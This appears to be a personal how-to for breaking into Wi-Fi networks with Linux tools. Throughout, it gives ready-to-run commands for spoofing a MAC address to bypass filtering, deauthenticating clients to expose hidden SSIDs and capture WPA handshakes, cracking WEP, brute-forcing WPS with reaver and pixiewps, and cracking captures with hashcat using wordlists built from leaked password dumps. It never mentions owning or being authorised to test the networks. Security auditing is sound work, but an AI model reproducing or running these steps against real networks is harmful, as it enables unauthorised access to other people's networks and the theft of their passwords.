Hashcat is a tool to crack various hashes, passwords and other formats. Hashcat is now merged into one OpenCL version(used to have a CUDA version for nvidia GPUs- CudaHashcat, the new hashcat only supports OpenCL).

For WPA2 it uses a new(2017) format called hccapx.


Packages: aircrack-ng wireshark-qt macchanger reaver-wps-fork-t6x

Kill your network manager service to avoid it interfering.

I am using NetworkManager.

sudo systemctl stop NetworkManager - sometimes it starts again so just try this twice…

Then use sudo airmon-ng to find out your interface name for the wireless card you want to use. If it is not listed, you are either lacking drivers or it is not compatible.

After finding out your interface name, turn your WLAN card into monitor mode with sudo airmon-ng start yourInterface, you will then have a yourInterfacemon interface you can use. You can use the –verbose flag with the command to diagnose possible issues if it is not working as intended. You can use stop instead of start to make the interface go back to managed mode and use wi-fi as usual.

Since the default interface tends to be wlp8s0, that is what I am going to use for this page.

Change your MAC:

ip link set dev wlp8s0 down - bring the interface down so you can make changes to it

macchanger -r wlp8s0 - randomize MAC address completely. Alternatively use -m option and supply an address starting with 68:5D:43 or any other vendor specific address, as some routers and networks will not allow MAC that is not assigned to any vendor. (MAC is in this format XX:XX:XX:YY:YY:YY where XXXXXX is vendor specific and YYYYYY is random)

ip link set dev wlp8s0 up


There is a script called wifite that can do most of these attacks even if the attacker doesn't understand them. It fails in some more complicated cases.

git clone

cd wifite/

sudo python2.7 ./

Scan your surroundings

sudo airodump-ng wlp8s0mon

MAC address filtering

Use airodump to look for an active client and change your MAC address to theirs.

Hidden SSID

aireplay-ng -0 0 -a 00:1F:1F:1F:1F:1F -c 00:1F:1F:1F:1F:1F –ignore-negative-one wlp8s0mon

while running airodump. Successfully deauthing a client will make them broadcast the SSID in the clear because they'll have to reconnect.


airmon-ng start wlp8s0

airodump-ng wlp8s0mon

airodump-ng -w wep -c CHANNEL –bssid BSSID wlp8s0mon

aireplay-ng -1 0 -a BSSID wlp8s0mon

aireplay-ng -3 -b BSSID wlp8s0mon

aircrack-ng filename.cap


airmon-ng start wlp8s0

airodump-ng wlp8s0mon

airodump-ng -c CHANNEL -w filename –bssid BSSID wlp8s0mon

aireplay-ng -0 0 -a BSSID wlp8s0mon

After obtaining 4-way handshake:

aircrack-ng –w WORDLIST -b BSSID filename.cap



Scan for WPS enabled APs

sudo wash -i wlp8s0mon

For Bruteforcing and logging for possible pixie attack. Use -K 1 parameter to try pixiewps while reaver is running. The plain bruteforce attack might take minutes to days, but usually it's max 10 hours.

sudo reaver -i wlp8s0mon -b BSSID -c channel -f -S -vvv -H

After obtaining at least one response you can use pixiewps to try the offline pixie attack. Whole pixiewps command will be saved in a text file if you supplied the -H command. Pixie attack takes anywhere from a second to 30 minutes, and only works if the router is vulnerable to it.

Cracking a handshake/capture file

Using GPU

Converting .cap to .hccapx

Use cap2hccapx (from the hashcat-utils package)

cap2hccapx capture.cap capture.hccapx

HCCAP to password

hashcat -m 2500 -w 1 filename.hccapx wordlist.txt

Using CPU

IVS file crack aircrack-ng -a2 -b F8:8E:88:AA:FF:BB -w wordlist-final.txt ivsfile.ivs

Find out default gateway route -n

Obtaining wordlists have awesome leaked lists, so I'm going with a bunch these. You can find different lists on torrent trackers.

7z x xxx_found.7z -owordlists - extract file into a folder called 'wordlists'

cat xxxfoundsorted.txt xxxfoundsorted.txt xxxfoundsorted.txt > mywordlist.txt - join all lists into one

sed -r '/^.{,7}$/d' mywordlist.txt > WPAwordlist.txt - remove everything that is 7 characters or less from the file and write that to a new file. WPA/2 does not accept less than 8 characters.

sort -T ~ -u WPAwordlist.txt > WPAwordlist_sorted.txt - change temporary directory to the home directory(sort would fail on a big file if /tmp is too small) and sort into a new file